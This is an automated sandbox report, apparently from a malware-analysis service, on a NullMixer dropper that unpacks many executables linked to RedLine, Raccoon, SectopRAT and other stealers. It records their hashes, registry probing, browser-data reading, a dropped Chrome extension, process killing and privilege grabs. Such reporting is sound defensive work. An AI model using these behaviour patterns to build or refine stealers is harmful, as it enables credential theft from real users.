
\Users\Admin\AppData\Local\Temp\7zSC2959AD6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zSC2959AD6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1993b3f72c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19150ee2be694c8a4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue192762f1cd058ddf8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c78ded4d176ac.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up geolocation information via web service

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1969586bcbf58493.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19150ee2be694c8a4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19411ac950924ec3f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1993b3f72c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19325eb008c0b950.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331497987788" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19411ac950924ec3f.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c78ded4d176ac.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
